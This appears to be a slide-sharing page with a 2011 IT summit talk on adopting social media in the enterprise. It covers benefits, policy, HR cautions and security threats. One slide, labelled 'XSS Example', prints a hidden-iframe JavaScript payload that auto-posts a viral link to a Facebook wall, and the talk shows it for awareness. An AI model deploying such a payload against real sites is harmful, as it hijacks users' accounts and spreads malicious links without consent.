Upload
jamkjm
View
304
Download
0
Tags:
Embed Size (px)
DESCRIPTION
This presentation was given on June 27th at the 2011 MidTech IT Summit at the Red Rock Resort/Casino in Las Vegas, NV.
Citation preview
SOCIAL MEDIA:���INFILTRATING THE
ENTERPRISE
MIDTECH IT Summit June 27th, 2011
JAY A. MCLAUGHLIN, CISSP SVP, CHIEF INFORMATION OFFICER
DISCLAIMER The materials, thoughts, comments, ideas and opinions expressed throughout this presentation are entirely my own and do not necessarily represent the thoughts or
opinions of my employer (past or present).
AGENDA
• Defining social media • Embracing the Inevitable • Understanding the Benefits & Risks • Friending your Customers • Preventing social media disasters • Building a strategy
: forms of electronic communication (as Web sites for social networking and microblogging) through which users create online communities to share information, ideas, personal messages, and other content
Social media is media for social interaction using highly accessible and scalable communication techniques. Social media is the use of web-based and mobile technologies to turn communication into interactive dialogue.
What is Social Media?
• 500 Million • 250 Million • 700 Billion
Source: Facebook.com April 2011
It’s Corporate
• 6939 • 319 • 140 Million
Source: Twitter. com March 2011
It’s Mainstream
• 100 Million • 2 Million • 4.3 Billion
Source: LinkedIn.com May 2011
WHY SHOULD WE CARE?
• It's where your customers are
• It's where your prospects are
• It's reach stretches further broader than any marketing channel
• It's relevant to be in the game
“We don’t have a choice on whether we will DO
social media, the question is how WELL we DO it.”
- Erik Qualman, Author Socialnomics
http://www.youtube.com/user/Socialnomics09?blend=1&ob=5
Source: eMarketer, Nov 2010
* companies that have 100 or more employees
BUSINESS BENEFITS
Enhanced Collaboration
Shared Workspaces
Faster access to Information
Extended Organizational Reach
Ability to Compete
THE EQUALIZER
• When leveraged effectively, social networks become an equalizer, leveling the playing field
• It allows organizations both large and small to compete and be relevant in their space
• Ability to influence with little or not cost
UNANTICIPATED DISASTERS
PREVENTING DISASTERS
IS YOUR ORGANIZATION PREPARED FOR...?
• Employees posting opinions about the organization
• Managing brand reputation and public opinion/
exposure
• Responding to positive and negative feedback from
customers
• Standing by the decision NOT to get engaged....?
SOCIAL MEDIA SWOT
• Strength - ability to build relationships with your target audience like never before.
• Weakness - silo-ed as a business function and not integrated in overall business strategy.
• Threat - fear of losing control. Seeks risk aversion. Non-innovative.
• Opportunities - its where our customers are. Integration with the business is key.
ESTABLISHING A POLICY
?
THE BASICS • Do your employees know what is acceptable or permitted?
• How may (or not) employees identify themselves?
• To what degree can corporate content be used?
• Has your organization determined what is can do with information obtained through social media?
" Establishing a policy is critical!
• Governance required implement and enforce acceptable usage policy covering social networking sites
• It is key that all staff receive security awareness training covering your acceptable usage policy for social networking
• Promote good practices to help improve users behavior ultimately reducing and/or mitigating some of the risks
• Permit access only to social networking sites that have obvious business benefits only to users with a business need
ESTABLISH A STRATEGY
• Institute processes to manage and monitor activity
• Be flexible - overall uncertainty about what strategies and tactics to adopt to security social media
• Understand and identify which users create the most amount of risk?
• Create reasonable guidelines that can be followed
• Review sites terms and conditions to understand risks associated with each site
ESTABLISH A STRATEGY
REGULATION is coming
For regulated industries, what requirements do you face?
ex. FINRA
Employers know ALOT about their employees/candidates
• HR is tempted to“peak” at these sites to gather information about employees and potential candidates
• Consider discrimination lawsuits! Proceed with caution. - ex: viewing the online photo/picture of a candidate
• Consistency is KING - it will minimize your risk.
- ex: if conducting a search for ONE candidate, then do so for ALL
• Even if employers have the technical capability to gain access to social networking information of their employees or candidates, it does not imply the legal right to do so.
HR: OBTAINING INFORMATION FROM SOCIAL NETWORKS
consider ALL risks
Is there a need to address how to evaluate the risk of sharing too much information online in relation to the
value it brings to the business?
• There is a continued growth in social networking sites being used as an attack distribution platform
• Users are less likely to see malware when it is passed on by a friend as it has a certain level of authenticity and a level of trust
• Social networks give attackers a potentially powerful point of leverage, sometimes allowing them to launch sophisticated attacks against businesses
• Known weaknesses exist in the security of the networks themselves, which limit our control
Security Concerns
• Session-hijacking / authentication weaknesses
• Profile harvesting leading to social engineering - ex: phishing / spear-phishing
• Cross-site scripting (XSS) / Cross-site request forgery
(CSRF)
• Malicious code / Malware - ex: drive-by downloads
“Threatscape” of sites
<iframe id=”CrazyDaVinci” style=”display:none;” src=”http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload=function(){document.forms[0].message.value=’Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!‘;document.forms[0].submit();}</script>”></iframe>
• this bit of HTML/Javascript would be included in a viral page. • the code sets the content of the wall post to a message that includes a link to a viral page, then submits the prompt automatically.
XSS Example
Microsoft has documented a steady rise in the number of attacks targeting social networks
Primary vectors:
• Phishing attempts
• Social engineering tactics Instances of Phishing impressions increased from 8.3% to 84.5%
Verizon highlighted in its 2011 DBIR, that malware and social engineering to have been the culprit for 60% of all reported attacks/breaches
Contribution of malware:
• 49% of breaches
• 79% of records stolen
PROTECT & SERVE
Policing Social Media: How do we protect the usage of social networks?
• Is it possible to establish and implement a standard set of guidelines for enterprise users?
• ...that would help to not only prevent data leaks, but
also keep emerging social networking malware at bay?
• It requires a combination of technical, behavioral and organizational security controls
“Policing” Social Media
• Social media isn’t a choice anyone….recognize it is a business transformation tool • Perform a comprehensive risk assessment against all
social networks that will be considered for use
• Social networks DO introduce new security risks - take a formal approach to mitigate them through policy enforcement and user education • Doing nothing is not an option...will you take that
risk?
CONCLUSION
QUESTIONS?
@jaymclaughlin
linkedin.com/jaymclaughlin
Contact Info: